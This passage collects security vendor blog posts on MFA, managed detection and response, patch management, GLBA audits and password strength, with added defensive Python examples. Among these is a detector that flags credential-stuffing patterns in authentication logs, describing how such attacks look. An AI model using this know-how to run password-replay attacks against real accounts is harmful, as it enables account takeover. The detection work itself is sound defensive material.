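    def matches(self, s: SignIn) -> bool:
        if "*" not in self.resources and s.resource not in self.resources:
            return False
        if self.groups is not None and not (self.groups & s.groups):
            return False
        if not self.triggers:
            return True
        start, end = self.business_hours
        outside_hours = s.when.weekday() >= 5 or not (start <= s.when.time() < end)
        signals = {
            "outside_business_hours": outside_hours,
            "untrusted_location": s.location not in self.trusted_locations,
            "unknown_device": not s.device_known,
            "noncompliant_device": not s.device_compliant,
        }
        # Triggers are OR-ed: any one risky signal makes the policy apply.
        return any(signals[t] for t in self.triggers)


def evaluate(policies: List[Policy], s: SignIn):
    """Return (decision, names of policies that fired). Block wins over MFA."""
    fired = [p for p in policies if p.matches(s)]
    names = [p.name for p in fired]
    if any(p.control == "block" for p in fired):
        return "block", names
    if fired and not s.mfa_satisfied:
        return "require_mfa", names
    return "allow", names


# Constructed policy set modelled on the post's financial-data example.
POLICIES = [
    Policy("Finance data: MFA outside hours or from unknown device",
           {"finance-app"}, "require_mfa",
           triggers={"outside_business_hours", "unknown_device"},
           trusted_locations={"corp-hq"}),
    Policy("Admins: always require MFA", {"*"}, "require_mfa", groups={"admins"}),
    Policy("Block noncompliant devices", {"*"}, "block",
           triggers={"noncompliant_device"}),
]

# Constructed timestamps for the scenarios below.
WEEKDAY_10AM = datetime(2024, 3, 5, 10, 0)    # a Tuesday
WEEKDAY_10PM = datetime(2024, 3, 5, 22, 0)
SATURDAY_10AM = datetime(2024, 3, 9, 10, 0)

if __name__ == "__main__":
    for label, s in [
        ("finance, known device, office hours",
         SignIn("alice", {"finance"}, "finance-app", "unknown", True, True, WEEKDAY_10AM)),
        ("finance, known device, 22:00",
         SignIn("alice", {"finance"}, "finance-app", "unknown", True, True, WEEKDAY_10PM)),
        ("admin, noncompliant device, MFA already done",
         SignIn("bob", {"admins"}, "mail", "corp-hq", True, False, WEEKDAY_10AM, True)),
    ]:
        print(f"{label}: {evaluate(POLICIES, s)}")
```

The ordering in `evaluate` is the security-relevant part: a block decision from one policy must never be softened by another policy that merely asks for MFA, and a remembered device or trusted location only suppresses the MFA prompt for policies whose triggers depend on it, not for the always-on admin rule.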

Implementing MFA and conditional access policies strengthens your organization’s security posture and reduces the risk of security breaches. As always, it’s essential to work with a trusted IT partner like OneNeck to ensure security measures are correctly implemented and maintained.

The MFA Difference

So how much of a difference does MFA truly make? According to Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA), MFA can prevent 99.9% of hacks. Even if a cyber attacker compromises your password, they won’t be able to meet the second authentication requirement, which ultimately stops them from gaining access to your accounts.

MFA is not a one-size-fits-all solution but rather an essential step in securing your accounts. While it may seem like a hassle to set up MFA and follow password management and account protection best practices, it is important to remember that the consequences of a data breach or account compromise can be far-reaching and costly. In addition to the potential loss of sensitive data, there can be legal and regulatory ramifications, reputational damage, and financial losses. It is much better to take proactive measures to prevent these outcomes than to deal with the aftermath of an attack.

Another benefit of MFA is that, with a bit of finesse and conditional access, it can improve the user experience, or at least affect it only minimally. While the initial setup and authentication process may take a few extra seconds, users feel more secure knowing that an additional layer of security protects their accounts. Additionally, many MFA solutions offer the option for “remembered devices” or “trusted locations” where the user will not be prompted for an MFA login. This automation makes the process smoother and less disruptive while maintaining security.

It is worth noting that while MFA is highly effective at preventing most types of account attacks, it is not the end of your security journey. Some attacks, such as phishing or social engineering, can bypass MFA by tricking the user into providing their credentials to a malicious actor. Additional layers, such as endpoint protection, will be the next step on your path to a more secure environment.

Get the Most from Microsoft 365 with OneNeck

Whether you need support securing Microsoft environments, backing up M365 data or maximizing your licensing investment, OneNeck is here to help. We are a skilled Microsoft Cloud Service Provider with wide-ranging experience assisting hundreds of clients throughout their M365 adoption journey. Let us help you find the right-fit solutions for your organization’s productivity needs.

Contact us today to speak with a member of our team.

Managed Threat Detection & Response: Prevent Cyberattacks
https://www.oneneck.com/blog/managed-threat-detection-and-response-get-ahead-of-cyberattacks/
Thu, 16 Feb 2023 20:04:21 +0000

With 70% of breaches today originating at endpoints—such as servers, laptops, Internet of Things (IoT), and mobile devices—it’s increasingly important for organizations to implement a robust security strategy like managed threat detection and response to protect against threats. But navigating the threat detection and response solutions landscape can be confusing, especially for businesses that lack deep cybersecurity expertise.

This article describes two popular approaches to threat detection and response and helps you choose the right one for your business.

What Is Managed Threat Detection and Response?

Managed detection and response (MDR) is an outsourced cybersecurity solution offered by a managed security service provider (MSSP). MDR comprises a comprehensive array of network, host, and endpoint security tools that perform ongoing monitoring to identify and respond to threats pre-emptively. MSSPs also provide specialized cybersecurity expertise.

What Is MDR vs. EDR?

Unlike MDR, which is a service, endpoint detection and response (EDR) is a cybersecurity platform that helps organizations identify and respond to threats that target vulnerable, network-connected endpoints. The biggest difference between EDR and MDR is scale.

EDR

  Benefits
  • Protection against many cyberattacks
  • Visibility into the attack surface
  • Artificial intelligence to analyze logs
  • Forensics to investigate attacks

  Best for organizations that…
  • Use standalone anti-virus or anti-malware solutions to protect endpoints
  • Use few, if any, cloud solutions
  • Have skilled, in-house security personnel to handle high alert volumes

  May not be ideal for organizations that…
  • Use cloud solutions extensively
  • Lack skilled, in-house security personnel to handle high alert volumes

MDR

  Benefits
  • Turnkey 24/7/365 threat-hunting and critical incident response services
  • Comprehensive tools that are costly to buy
  • Expert support

  Best for organizations that…
  • Use cloud solutions extensively
  • Need robust threat protection

  May not be ideal for organizations that…
  • Have a large team of highly skilled, in-house security personnel who can perform ongoing threat detection and response across all endpoints, networks, and cloud implementations

Managed Detection and Response Addresses Common Security Threats

To manage threats effectively, organizations first need to know what kinds of threats MDR can help mitigate. This list covers the most common types.

Ransomware

Ransomware is malware that attacks a computer, network, or server. Malicious software locks the victim’s device, then a cybercriminal demands payment to restore it.


Phishing

Phishing attacks target individuals using social engineering methods, such as email, phone, texting, and social media. They aim to manipulate the recipient into revealing sensitive information like their password or credit card number. Some phishing attacks install viruses on the victim’s device.

Denial of Service

Denial-of-Service (DoS) attacks target organizations with the goal of disrupting business operations by inundating a network or server with spam requests. When the target becomes overwhelmed, necessary business services become unavailable, so employees can no longer perform their tasks. Although DoS attacks rarely involve ransomware, the disruption they cause can be costly.

A Distributed Denial-of-Service (DDoS) attack is a more serious type of DoS attack. Here, multiple machines overload an edge network device—such as a router or switch—rather than targeting a server.

Man in the Middle

Man in the Middle (MitM) refers to a category of identity-based cyberattacks in which a bad actor surreptitiously eavesdrops on an online communication between a client and a server. The most common MitM attack exploits vulnerabilities in the victim’s browser to inject malware into their device. Cybercriminals commonly use MitM attacks to capture sensitive financial data in real time by intercepting traffic between a user and a banking website.

Other cybersecurity threats

Today’s cybersecurity environment includes many other dangers, including blended threats that leverage multiple methods and previously unseen zero-day threats.

As the IT perimeter continues to blur, organizations need to stay ahead of threats, such as

  • Sophisticated mutating software
  • Advanced persistent threats (APTs) that gather intelligence through surveillance
  • Cloud vulnerabilities
  • Web application attacks, such as a SQL injection (SQLI)
  • Supply chain attacks that target trusted relationships and third parties
  • Spoofing attacks disguised as legitimate websites and email addresses

How to Get the Protection You Need

OneNeck partnered with Fortra’s Alert Logic to bring together a powerful set of capabilities that ensure businesses get all the security protection they need:

  • The Platform—Provides comprehensive security coverage, regardless of whether your workloads are in one or many clouds, containers, serverless, or on premises
  • The Intelligence—Includes dozens of seasoned security researchers, data scientists, and engineers with vast industry experience
  • The Expertise—Fortra’s 150 skilled security operations center (SOC) analysts partner with OneNeck’s security experts, who act as your point of contact. As your managed services provider, we understand your IT environment and are committed to keeping it safe.

Let Fortra’s Alert Logic and OneNeck Protect Your Network

No organization is too small to experience a breach. Make sure you don’t become a victim.

Do you need a better security strategy for the cloud or expert security talent to help protect your IT infrastructure? Or maybe you just want to reduce your total cost of ownership (TCO)?

Together, OneNeck and Fortra’s Alert Logic can help you implement a managed threat detection and response strategy that provides comprehensive security in today’s risky IT landscape.

Contact us to learn how you can protect against threats in real time.


Frequently asked questions…

Does MDR replace SIEM?

Managed Detection and Response (MDR) and Security Information and Event Management (SIEM) are both security solutions, but they serve different purposes and are not direct replacements for each other. SIEM is primarily focused on log management, correlation, and event analysis to provide a comprehensive view of security threats, while MDR is a more proactive solution that combines threat intelligence, behavior analytics, and expert analysis to detect and respond to advanced threats.

What’s the difference between MSP and MSSP?

Managed Service Providers (MSPs) and Managed Security Service Providers (MSSPs) both provide managed services to clients, but their focus areas differ. MSPs primarily provide managed services for IT infrastructure and operations, while MSSPs specialize in managed security services, such as threat detection, incident response, and compliance management. MSSPs typically offer a broader range of security-focused services and have more specialized expertise than MSPs.

Is EDR the same as antivirus?

Endpoint Detection and Response (EDR) and antivirus (AV) software are both security solutions that protect against malware and other threats, but they have different approaches and capabilities. AV software uses signature-based detection to identify known threats and prevent them from infecting the system, while EDR is a more advanced solution that uses behavior-based analysis and machine learning to detect and respond to both known and unknown threats.

What is endpoint security?

Endpoint security refers to the practice of securing endpoints, such as desktops, laptops, smartphones, servers, and other network-connected devices, from cyber threats. The goal of endpoint security is to protect these endpoints from unauthorized access, data theft, malware, and other types of cyberattacks by using a combination of technologies, tools, and policies to detect, prevent, and respond to threats.

What is Patch Management?
https://www.oneneck.com/blog/what-is-patch-management/
Mon, 13 Feb 2023 20:51:17 +0000

What is Patch Management?

Patches are software and operating system updates that address security vulnerabilities and are used to keep all digital assets up to date. On an individual level, patch management is fairly straightforward. A vulnerability is discovered, a patch is developed and then run by the end-user when time allows or performed via the system’s auto-update feature.

Scaling up to an organizational level, however, significantly increases complexity, and efficient patch management becomes a necessity. Systems today are interconnected, and changes or downtimes in one area can have unforeseen and unintended effects throughout an organization. Because of these factors, many businesses struggle to implement company-wide patching, leaving themselves vulnerable to cyber attacks or other disasters.

Importance of Patching

Patching foremost helps secure computer systems and servers against potential security threats. Cybercrime is a problem all organizations face, and malicious actors constantly search for new ways to exploit known vulnerabilities. A report from Positive Technologies shows 31% of companies have detected attempts to exploit software vulnerabilities.

Organizations can close security gaps by regularly applying patches, preventing attackers from accessing sensitive data or compromising systems. Neglecting to patch systems promptly leaves them vulnerable to cyberattacks, data breaches, loss of sensitive information or financial damage. According to a Ponemon survey, unpatched vulnerabilities were involved in nearly 60% of data breaches.

Patching also helps maintain the stability and compatibility of software systems. Many patches include fixes for bugs and other issues that can cause the software to crash or behave unexpectedly. Patching ensures that software remains functional and uninhibited by errors, reducing the risk of downtime and the need for costly technical repair.

In addition to resolving bugs and security issues, patching often provides access to new features and enhancements. Software vendors regularly release updates that add new functionality. Organizations can utilize these improved features to enhance their workflow.

Finally, patching is essential for compliance with various regulatory requirements. Many industries are subject to strict regulations and standards that require the protection of sensitive information and consistent maintenance of technical environments. By regularly patching systems and servers, organizations can demonstrate their adherence to these regulations and avoid potential legal penalties.

Common Problems with Patch Management

While the benefits of patching are pretty straightforward, many organizations face challenges in implementing a consistent approach to patch management. There are several reasons why system-wide patch management is problematic for businesses, including:

Complex IT Environments

Many organizations have complicated IT environments, with a variety of systems, servers, and applications running on multiple platforms. This inherent complexity makes it challenging to track which systems need patching, and when. Additionally, older systems and applications may not be compatible with all patches, making it difficult for organizations to maintain security and stability.

Patch Testing & Review

Before applying any patch, organizations must review all new releases alongside their accompanying notes and run tests to ensure updates won’t trigger compatibility issues with existing systems. This process is time-consuming and resource-intensive, especially for larger organizations with expansive IT environments.

Downtime Concerns

Applying patches often requires systems to be offline for a period of time. This downtime can potentially lead to a temporary loss of productivity and revenue. Because of this concern, patching is often pushed to non-typical business hours, forcing IT staff to work overnight or during weekends.

Resource Limitations

Many organizations have limited IT resources, making it challenging to prioritize patching in the face of other pressing demands on time and budget.

The difficulty in patching for businesses is often due to a combination of these factors, including the sheer volume of systems and applications that need to be maintained and the need to balance security and stability with the demands of day-to-day operations. Despite these challenges, organizations must prioritize patching and adopt effective strategies for maintaining their systems.

Outsourcing Patch Management

Outsourcing patch management can be an effective solution for organizations that lack the expertise or resources to manage this process in-house. By working with an experienced vendor, organizations can ensure their systems are secure and up-to-date while freeing up internal resources to focus on other important tasks and initiatives. A business might choose to outsource patch management for numerous reasons:

Lack of In-house Expertise

Organizations may not have the technical expertise or resources to manage patching effectively. By outsourcing patch management, a business gains access to the skills and know-how of a partner specializing in this area.

Reviews, Tests and Validation

Reviewing release notes for all pertinent information and testing the effects of each patch are essential steps. An organization tackling this on its own will undoubtedly find the process both demanding and laborious. Enlisting external assistance speeds up validation and likely reduces cost.

Time and Staff Usage Reduction

Outsourcing patch management helps organizations save time and reduce expenditures by eliminating the allocation of internal staffing resources, thus freeing their IT teams to focus on more strategic projects and initiatives.

Improved Efficiency and Security

Organizations can benefit from a partner’s streamlined processes and automated tools, helping to reduce downtime and ensure patches are applied consistently and punctually.

Access to Best Practices

An experienced patch management vendor can bring best practices and expertise that an organization might not have access to otherwise.

Compliance

Many industries have strict regulations regarding data and systems security. By outsourcing patch management, organizations can ensure that they meet these protocols and maintain compliance with industry standards.

The benefits, especially for small and mid-sized businesses, of obtaining outside assistance with patch management go beyond those listed above. Engaging a partner to perform patch management allows for a patching timetable that complements an organization’s production environment. Additionally, an experienced partner works with multiple clients, meaning well-rounded, real-world experience and the ability to adapt whenever necessary.

OneNeck Has Your Back!

While patching may be time-consuming and complex, it is critical to ensuring your organization is safe and secure from cyberattacks. OneNeck is here to help with an experienced team that provides solutions for patching and any other aspect of systems management that your organization may require. We have extensive experience across multiple platforms and industries, allowing us to provide a right-fit solution for you.

Contact us today to speak with a member of our team, and learn more about our patch management services here.

Check out our Monthly Patching Blog series to keep up to date on the latest critical updates from our vendors.


Frequently asked questions…

Who is responsible for patch management? 

While patching is often the responsibility of the operations or infrastructure team, it is a process that involves everyone in the organization.

What is a patch management plan? 

Patch management is the process for identifying, acquiring, testing, installing and verifying software and/or firmware updates. An effective patch management plan ensures all identified system components are the latest version supported by a vendor.

How do I create a patch management plan? 

Creating a patch management plan is accomplished by developing a process that performs necessary patching in a consistent and timely manner. Organizations must identify updates, review release notes, test for system compatibility and perform installs with minimal disruption to operations.
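The identify, test and verify steps of such a plan come down to knowing, per host, which installed versions fall below a vendor’s fixed version, and staging the rollout so a pilot group is patched and checked before production. The following added example (written for this post; not OneNeck’s tooling) shows that bookkeeping. The inventory and advisories are constructed sample data, the `pilot`/`prod` ring names are an assumption, and versions are assumed to be dotted numeric strings, which is why they are compared as integer tuples rather than as strings.

```python
from collections import defaultdict

# Constructed sample inventory: (hostname, rollout ring, package, installed version)
INVENTORY = [
    ("web-01", "pilot", "openssl", "3.0.12"),
    ("web-02", "prod", "openssl", "3.0.12"),
    ("db-01", "prod", "openssl", "3.0.13"),
    ("db-01", "prod", "postgres", "15.4"),
    ("app-01", "prod", "postgres", "15.6"),
    ("app-01", "prod", "java", "17.0.9"),
    ("app-01", "prod", "openssl", "3.0.12"),
]

# Constructed vendor advisories: package -> [(fixed version, severity), ...]
ADVISORIES = {
    "openssl": [("3.0.13", "critical")],
    "postgres": [("15.6", "high")],
    "java": [("17.0.10", "medium")],
}

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}
RING_ORDER = ["pilot", "prod"]   # pilot is patched and verified before prod


def parse_version(v):
    """'3.0.12' -> (3, 0, 12). Tuple comparison is numeric; as strings,
    '3.0.9' would sort after '3.0.12' and hide an outstanding patch."""
    return tuple(int(part) for part in v.split("."))


def outstanding_patches(inventory, advisories):
    """Identify step: {host: [(package, installed, fixed, severity), ...]},
    each host's list ordered with the most severe fix first."""
    todo = defaultdict(list)
    for host, _ring, pkg, installed in inventory:
        for fixed, severity in advisories.get(pkg, []):
            if parse_version(installed) < parse_version(fixed):
                todo[host].append((pkg, installed, fixed, severity))
    for host in todo:
        todo[host].sort(key=lambda entry: SEVERITY_RANK[entry[3]])
    return dict(todo)


def rollout_plan(inventory, advisories):
    """Stage hosts by ring so compatibility problems surface in the pilot ring
    before the same patch reaches production."""
    ring_of = {host: ring for host, ring, _pkg, _ver in inventory}
    todo = outstanding_patches(inventory, advisories)
    plan = []
    for ring in RING_ORDER:
        hosts = sorted(h for h in todo if ring_of[h] == ring)
        if hosts:
            plan.append((ring, hosts))
    return plan


def verify(inventory_after, advisories):
    """Verify step: hosts still carrying a vulnerable version after patching."""
    return sorted(outstanding_patches(inventory_after, advisories))


if __name__ == "__main__":
    for host, fixes in outstanding_patches(INVENTORY, ADVISORIES).items():
        print(host, fixes)
    print(rollout_plan(INVENTORY, ADVISORIES))
```

Running `verify` against a re-collected inventory after each ring closes the loop the FAQ describes: a patch counts as applied only when the installed version on the host, not the deployment job’s status, is at or above the fixed version.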

Is patch management a part of cybersecurity? 

Patch management is an essential aspect of an organization’s cybersecurity posture. Unpatched software applications or operating systems are a prime cause of security breaches.

GLBA Audit for Educational Institutions
https://www.oneneck.com/blog/glba-audit-for-educational-institutions/
Tue, 07 Feb 2023 16:28:12 +0000

What the GLBA Audit Includes and How to Navigate the Pre-Audit Process


The Gramm-Leach-Bliley Act (GLBA) is a longstanding United States law that includes provisions protecting the privacy of consumers’ financial information. The GLBA applies to all institutions offering consumers financial products or services. The U.S. Department of Education Federal and Student Financial Aid Office has asserted that Title IV Institutions of Higher Education are considered “financial institutions” and thus subject to the GLBA.

In October 2021, the FTC announced revised provisions of the Safeguards Rule requiring non-banking financial institutions, such as institutes of higher education, to develop, implement and maintain a comprehensive security system to keep their customers’ information safe.

Successfully enacting these provisions is critical for passing a GLBA audit. The revised rule was initially set to take effect on December 9, 2022, but a six-month extension was granted, pushing the deadline to June 2023.

Safeguards Rule

The Safeguards Rule instructs organizations to implement administrative, physical and technical protections as safeguards against cyberattacks, email spoofing, phishing schemes and similar cybersecurity risks. These provisions are where educational institutions will likely struggle to achieve and maintain compliance. Identifying and assessing risks, developing and maintaining an information security program and creating detailed incident response plans are a heavy drain on time, staffing and a school’s limited resources. Obtaining outside assistance in these areas is often a necessity.

GLBA Audit: Safeguards Rule updates for June 2023

GLBA Audit for Educational Institutions

With the June deadline fast approaching for institutions of higher education, it is imperative that schools not only understand what provisions auditors are examining but also how to prepare for the GLBA audit process. A proper pre-audit assessment demands action and input from multiple staff members, including those in the financial offices (Financial Aid Office, Registrar, etc.), security (both physical and digital) and others in information technology. Coordinating and performing such an undertaking will likely involve teaming with an experienced outside partner.

Your organization may already be employing some provisions, such as encryption of sensitive data, limiting and monitoring information access, as well as staff training on security and information security. If not, these practices should be part of your institution’s overall security program.

Other provisions, such as the designation of a qualified individual to oversee an institution’s information security program and the training of security personnel, are aspects that organizations must plan out based on available personnel. While the Safeguards Rule does mandate that a qualified individual oversee the GLBA-required security program, this individual may certainly receive assistance (internal or external) in this management.

The provisions for which educational institutions will likely require outside assistance are the performance of risk assessment and the development of an IR plan as part of a comprehensive security program. Even if some aspects already exist within an educational organization, the scope and complexity of the GLBA requirements will likely exceed the time and resources available to a school’s IT staff. Engaging a knowledgeable partner who can perform a comprehensive pre-audit assessment and communicate effectively on risk and mitigation steps is highly recommended, and doing so completes one of the audit requirements.

Pre-Audit Risk Assessment

A risk assessment should be built on an industry-standard security framework such as the Center for Internet Security (CIS) Controls or NIST SP 800-171. Use of these frameworks, while not currently obligatory, represents a best practice when preparing for any cybersecurity audit. The Office of Federal Student Aid has suggested that Title IV institutions consider using the NIST SP 800-171 framework for risk self-assessment. However, the simpler CIS Controls framework is a viable option that may be a better fit for organizations with a smaller security staff. The CIS Controls are a straightforward set of 18 controls that provide actionable steps for minimizing data breaches and significantly reducing the risk of cyberattacks.

Using a chosen cybersecurity framework, like NIST or CIS Controls, institutions must conduct a risk assessment across all covered organizational units. Upon risk identification, concise documentation for each safeguard employed is necessary for tracking implementation progress. Risk assessments that meet auditor requirements will address the following:

  • Employee security training and management
  • Organizational vulnerabilities
  • Understanding of the threats that might exploit those vulnerabilities
  • Concise documentation of the actions taken to mitigate every discovered risk

Security Program’s Incident Response Plan

While self-assessment helps identify risks and establishes measures to avoid them, breaches are always possible. Constructing a response plan for security events is vital to passing the audit. In the unfortunate but likely event that a breach occurs, it is critical to have an established plan to handle communications, coordinate investigation and containment, and rapidly eradicate the attack. Auditors are looking for institutions to have a security program that includes a written IR plan providing for the following components:

  • Identification of types of incidents that could occur, such as data breaches, cyberattacks or natural disasters
  • Establishment of an IR team with specific roles and responsibilities
  • Procedures for identifying and responding to incidents, including steps for containment and mitigation, preservation of evidence, as well as notification to affected individuals, key stakeholders (including employees, students or parents) and regulatory authorities
  • Testing of the IR plan through scheduled drills and exercises
  • Periodic review and update of the IR plan that adapts to institutional changes or external threats
  • Recording of incidents, responses, outcomes and measures to prevent recurrence

Beyond the Assessment

Ultimately, the goal is not just to pass the audit through a series of ‘check the box’ exercises but to truly secure data and infrastructure. The GLBA audit process is not a one-time action but rather a long-term commitment to a set of best practices. Doing it correctly requires significant resources and time and involves constant reassessment and adjustment to meet current and future risks.

OneNeck’s experienced team is here to help you prepare for GLBA audit compliance and to continue working with your technology team as your security posture matures. Our pre-audit services include the required risk assessment of the security controls that fall under GLBA, assistance documenting your security program, and review or development of an IR plan that clearly identifies the processes and procedures to follow in the event of an incident.

Contact us to speak to a member of our experienced security team today.


Frequently asked questions…

What happens if you violate GLBA?

Violating the GLBA (Gramm-Leach-Bliley Act) can result in severe penalties, including fines and legal action. The exact consequences depend on the severity of the violation and can range from monetary penalties to imprisonment for individuals found guilty of criminal violations.

What are the three key rules of GLBA?

Firstly, financial institutions must provide customers with privacy notices explaining how they collect and share customers’ personal information. Secondly, customers must be given the option to opt-out of having their information shared with non-affiliated third parties. Thirdly, financial institutions must implement appropriate safeguards to protect customers’ personal information.

Who does the GLBA Safeguards rule apply to?

The GLBA Safeguards Rule applies to financial institutions, including banks, credit unions, securities firms, and insurance companies, as well as non-financial institutions that receive or maintain personal information about customers of financial institutions in connection with providing services to those institutions.

What is the goal of the FTC Safeguards Rule?

The goal of the FTC Safeguards Rule is to protect consumers’ personal information held by financial institutions by requiring them to develop and implement comprehensive information security programs. The rule aims to ensure that financial institutions are taking appropriate measures to safeguard sensitive customer information from unauthorized access, use, or disclosure.

 

Is My Password as Safe as I Think It Is? https://www.oneneck.com/blog/is-my-password-as-safe-as-i-think-it-is/ Tue, 17 Jan 2023 17:07:39 +0000

Password Security Challenges

Passwords have long been the leading method of authenticating users and protecting sensitive information. However, as technology advances and the sophistication of cyber threats continues to evolve rapidly, the security of passwords is more critical than ever. Everyone must ask, “Is my password as safe as I think it is?”

The principal issue with passwords is that they can be easily compromised. Attackers use various techniques to obtain passwords, including socially engineered phishing attacks, keyloggers, and dictionary attacks. Additionally, many users employ weak, easily guessable passwords, some of the most common being “123456,” “password,” or “guest.” Using unsafe passwords makes it easy for attackers to access accounts and steal sensitive information.

Another challenge of passwords is that if users forgo short and obvious passwords, they often run into the issue of password retention. Everyone has multiple accounts and passwords, and it can be challenging to keep track of them all. As a result, people often reuse passwords across multiple accounts or write them down (monitor sticky-note, anyone?), thus compromising security.

Finally, even when following best practices, there are still risks concerning the security of password databases. If an organization’s password database is breached, all of its users’ passwords face the potential of being exposed. Such breaches have occurred in several high-profile instances, compromising millions of passwords and associated user IDs.

So, are passwords as safe as most users think they are? Probably not. While passwords certainly provide some level of protection, they are not infallible, especially on their own. However, everyone can employ several tips and strategies that vastly decrease the likelihood of their accounts being compromised.

Ways to Protect Your Passwords

It should come as no shock that strong and unique passwords are safer and more challenging to crack. Even with this knowledge, many individuals still fail to put it into practice consistently. Length, complexity and account separation are all crucial factors to consider when creating strong passwords.

Password Length

The length (total number of characters) is one of the essential aspects of password effectiveness. At its most basic, longer passwords are more difficult to crack because they have a larger number of possible combinations. Thus, it is harder for an attacker to guess the correct password through a “brute force” attack, which systematically tries many combinations of characters to guess a password. The attacker uses software to automate the process of trying different combinations and often starts with the most commonly used characters or words. More sophisticated brute force attacks can also include “password dictionaries,” lists of words and phrases of the most widely used passwords.

Each additional character multiplies the number of possible combinations a brute-force attack must try to compromise a password, so the keyspace grows exponentially with length. The minimum password length generally accepted by cybersecurity experts is 14 characters. A 14-character password made up of random letters and numbers has approximately four quadrillion possible combinations (yes, with a “q”). The sheer volume of possible combinations significantly fortifies passwords against brute-force attacks.

Password Complexity

A second vital aspect of password effectiveness is complexity. Ultimately, complex passwords are more difficult to crack than simple ones and thus provide a more robust level of security. A complex password includes a mix of character types, such as uppercase and lowercase letters, numbers, and special characters – including spaces when permitted. Using a mixture of character types vastly increases the number of possible combinations.

Another reason why complexity is essential is that it makes it harder for an attacker to use the aforementioned “dictionary” attack. If your password is a complex, unique and random string, it is not likely to be found in the attacker’s pre-computed list. This complexity also makes it difficult for anyone, even individuals in direct contact with a user, to deduce or guess a password.

Password Separation

Using separate passwords for different accounts is vital for security as it reduces the risk of compromising multiple accounts if a password is stolen or otherwise obtained by an attacker. If the same password is used for multiple accounts, and an attacker can obtain that password, they potentially have access to all associated accounts. Breaches like this can be particularly problematic if one of the accounts is sensitive, such as an organizational or financial account.

If separate passwords are used for all accounts and an attacker obtains one of them, the attacker will only be able to access the account associated with that password. They will not be able to access any other accounts, which limits the damage they can do. This separation of passwords also protects individuals against automated attacks called “credential stuffing,” where attackers take lists of stolen usernames and passwords (often from another data breach) and try them against a variety of accounts (email, credit cards, business systems, etc.). Using a unique password for each account reduces the possibility of a single compromised password having a far-reaching negative impact.
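Credential stuffing has a recognizable shape in authentication logs: one source trying many different usernames in a short time, mostly failing, because it is replaying somebody else’s breach list rather than a user retrying their own password. The following is an added example (not code from the original post or from OneNeck) of detection logic a defender could run over identity-provider logs. The log format, the source IPs, the usernames and the thresholds are all constructed for illustration; adapt the parser to your own provider’s schema.

```python
"""Flag credential-stuffing patterns in authentication logs (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: "<ISO timestamp> <source_ip> <username> <result>"
SAMPLE_LOG = """\
2023-01-17T09:00:01Z 203.0.113.7 alice FAIL
2023-01-17T09:00:02Z 203.0.113.7 bob FAIL
2023-01-17T09:00:03Z 203.0.113.7 carol FAIL
2023-01-17T09:00:04Z 203.0.113.7 dave FAIL
2023-01-17T09:00:05Z 203.0.113.7 erin SUCCESS
2023-01-17T09:00:06Z 203.0.113.7 frank FAIL
2023-01-17T09:00:40Z 198.51.100.4 alice FAIL
2023-01-17T09:00:55Z 198.51.100.4 alice FAIL
2023-01-17T09:01:10Z 198.51.100.4 alice SUCCESS
2023-01-17T09:02:00Z 192.0.2.9 grace SUCCESS
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, ip, username, succeeded)."""
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result == "SUCCESS"


def detect_credential_stuffing(log_text, window=timedelta(minutes=5),
                               min_distinct_users=5, max_success_ratio=0.5):
    """Return {source_ip: summary} for sources that tried many different accounts
    within `window` with mostly failures.  A single user who mistypes their own
    password (198.51.100.4 above) touches one username and is not flagged."""
    events = sorted(parse_line(line) for line in log_text.strip().splitlines())
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))

    flagged = {}
    for ip, evs in by_ip.items():
        best = None
        start = 0
        # Sliding time window over this source's events, oldest to newest.
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            chunk = evs[start:end + 1]
            users = {u for _, u, _ in chunk}
            successes = sum(1 for _, _, ok in chunk if ok)
            if len(users) >= min_distinct_users and successes / len(chunk) <= max_success_ratio:
                if best is None or len(users) > best["distinct_users"]:
                    best = {
                        "distinct_users": len(users),
                        "attempts": len(chunk),
                        "successes": successes,
                        # Accounts that accepted a replayed password: reset these first.
                        "compromised_candidates": sorted(u for _, u, ok in chunk if ok),
                    }
        if best is not None:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, summary in detect_credential_stuffing(SAMPLE_LOG).items():
        print(ip, summary)
```

The useful output for responders is the `compromised_candidates` list: a success in the middle of a spray of failures from the same source is the strongest signal that a reused password has just been validated, and those accounts should be reset and their sessions revoked before anything else.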

How Long Does it Take to Crack a Password?

Here is an excellent visual representation that illustrates the above concepts. It shows how long, with today’s computing power, it takes for brute-force attacks to crack passwords of various lengths and complexity. Many public email providers require a minimum 8-character password, which, even when using a combination of numbers, upper- and lowercase letters and symbols, can be cracked in 8 hours; adding just one character raises that to 3 weeks. Using a password with 14 characters raises the estimate to 200 million years!

[Chart: password length and character mix versus the estimated time needed to crack the password by brute force]

Creating a Strong Password

To review, a password must be long (preferably at least 14 characters) and complex (including numbers, letters, symbols and spaces when permitted). Additionally, each account should have a unique password. Since the average person has dozens of accounts, keeping track of and managing passwords can be challenging. There are recommended strategies to adopt and some things to avoid that help not only with creating strong passwords but also with keeping them organized.

  • Don’t use obvious details as passwords. Family members’ or pets’ names are among those most commonly used in passwords. While variations of these names may be simpler to remember, this information is generally easy to find online as open-source intelligence (OSINT) and results in easily compromised passwords. The same holds for important dates (birthdays, anniversaries, etc.) and locations (addresses or hometowns).
  • Instead of passWORDS, think more in terms of passPHRASES. Passphrases are typically longer than passwords and, therefore, harder to crack. A passphrase made of multiple random words can be more difficult to guess than a shorter, alphanumeric password, even if the password is considered complex. As with passwords, combinations of uppercase and lowercase letters, special characters and numbers are recommended.

Additionally, passphrases are often more memorable than random strings of characters, making it less likely that the user will have to write the passphrase down or store it in an unsecured location. They can also be harder to steal through phishing or social engineering tactics because, in most cases, they don’t contain personal information.

  • Password managers are a great way to keep track of login credentials. These tools use encryption to store passwords and can generate complex passwords for all online accounts. Additionally, they can be configured to fill in login information automatically, eliminating manual entry of usernames and passwords. This makes logging in both more convenient and more secure, since accounts are less likely to rely on weak or reused passwords. Another benefit of password managers is reduced exposure to phishing attacks: if a user unknowingly clicks a bad link, the password manager will not offer to fill in login credentials because it does not recognize the impostor website.
